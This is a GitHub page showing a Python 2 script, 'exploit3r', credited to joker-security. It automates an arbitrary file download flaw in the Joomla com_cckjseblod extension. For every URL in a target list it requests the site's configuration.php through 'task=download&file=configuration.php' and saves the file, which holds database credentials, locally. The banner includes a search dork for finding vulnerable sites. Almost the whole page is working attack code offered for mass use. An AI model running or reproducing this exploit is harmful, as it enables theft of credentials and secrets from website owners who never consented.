forked from joker25000/exploit3r
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit3r.py
More file actions
161 lines (148 loc) · 5.58 KB
/
exploit3r.py
File metadata and controls
161 lines (148 loc) · 5.58 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
#!/usr/bin/python
# -*- coding:utf-8 -*-
#
#
#
# exploit3r - Joomla Auto configure Donwload ®
# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+]Name : exploit3r [+]
#[+]Author : joker-security [ dev-labs ] [+]
#[+]Website : dev-labs.co [+]
#[+]Github : github.com/joker25000 [+]
#[+]Channel : www.youtube.com/c/Professionalhacker25 [+]
#[+]Facebook: facebook.com/kali.linux.pentesting.tutorials[+]
# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
__author__ = "Joker_Security"
import urllib2
import argparse
import urlparse
import requests
import threading
import BeautifulSoup
import time, sys , os
os.system('clear')
def clear():
if system() == 'Linux':
os.system("clear")
if system() == 'Windows':
os.system('cls')
os.system('color a')
else:
pass
class couleur():
vert = "\033[92m"
blanc = "\033[96m"
rouge= "\033[91m"
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(8./90)
print"""
##### \033[96m
###### # # ##### # #### # ##### # # #####
# # # # # # # # # # # # # \033[91m
##### ## # # # # # # # ##### # #
# ## ##### # # # # # # ##### \033[92m
# # # # # # # # # # # # #
###### # # # ###### #### # # ##### # #® """
parser = argparse.ArgumentParser(description='exploit3r - Joomla Auto Configure Donwload ')
parser.add_argument('-t','--targets', action='store',help='--targets joomla.txt')
hacker = parser.parse_args()
class Banner():
joker = '''
##### \033[96m
###### # # ##### # #### # ##### # # #####
# # # # # # # # # # # # # \033[91m
##### ## # # # # # # # ##### # #
# ## ##### # # # # # # ##### \033[92m
# # # # # # # # # # # # #
###### # # # ###### #### # # ##### # #®
[[..::Name : exploit3r ::..]]
[[..::Author : Joker-Security ::..]] \033[91m
[[..::Website : dev-labs.co ::..]]
[[..::Github : github.com/joker25000 ::..]] \033[96m
....................................................
[[..:: exploit3r - Joomla Auto Configure Donwload ::..]]
....................................................
® DOrk: inurl:option=com_cckjseblod® \033[92m
'''
if not hacker.targets:
os.system('clear')
print couleur.rouge+Banner.joker
slowprint("\033[96m[*] Usage: ")
slowprint("\033[91mpython exploit3r.py -h")
slowprint("\033[96mpython exploit3r.py -t Joomla.txt")
slowprint("\033[92mpython exploit3r.py --targets Joomla.txt")
print ''
exit()
class Joomla_Auto_Configure_Donwload(threading.Thread):
def __init__(self, targets):
threading.Thread.__init__(self)
targets = open(targets, 'r').readlines()
self.targets = targets
self.process = None
def run(self):
try:
joker = 0 + 1
print("\033[91m exploit3r - Joomla Auto Configure Donwload")
for achraf in self.targets:
try:
achraf = achraf.strip()
exploit3r = "/?option=com_cckjseblod&task=download&file=configuration.php"
csc = str(achraf+exploit3r)
try:
path = urlparse.urlparse(achraf).path
kader = achraf.replace(path, "")
title = requests.get(kader)
except:
title = requests.get(achraf)
exploit = urllib2.urlopen(csc)
sanfour = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore'))
algeria = str(sanfour.title.text)
with open(sanfour.title.text+".php","wb") as folder:
folder.write(exploit.read())
print "\033[92m]+[:::]-[:::]-[:::]-[:::]-[:::]-[ Information Exploit :]-[:::]-[:::]-[:::]-[:::]"
print "\033[92m[+] Target -> {}".format(couleur.rouge+kader)
print "\033[92m[+] Name -> {}".format(couleur.rouge+algeria)
slowprint("\033[96m]+[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::][:::]-[:::]-[:::]")
try:
print "\033[92m[+] Server -> {}".format(str(couleur.rouge+title.headers['server']))
except:
pass
print "\033[92m[+] Exploit3r -> {}".format(couleur.rouge+exploit3r)
print "\033[92m[+] Config Saved ->"+couleur.rouge+"/exploit3r/name.php"
print "\033[92m]+[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]"
print "\033[91m]+------------------------------------------------------------------------------+"
print ''
joker = joker + 1
except KeyboardInterrupt:
print"\033[91mExiting"
sys.exit(1)
except Exception as Error:
print "Error as {}".format(Error)
pass
slowprint("\033[92m[!] Total Exploit Found: %s" % str(joker))
sys.exit(1)
except KeyboardInterrupt:
print "Exiting...."
sys.exit(1)
def main():
try:
threads = 1
for host in range(int(threads)):
x = Joomla_Auto_Configure_Donwload(hacker.targets)
x.daemon=True
x.start()
while True: time.sleep(100)
except (KeyboardInterrupt, SystemExit):
print"\033[91mExiting exploit3r...."
if __name__ == '__main__':
try:
main()
except Exception as Error:
print"[!] Error as %s" % Error
exit()
except KeyboardInterrupt:
slowprint("\033[91m[!] Keyboard as Interrupt....")
exit()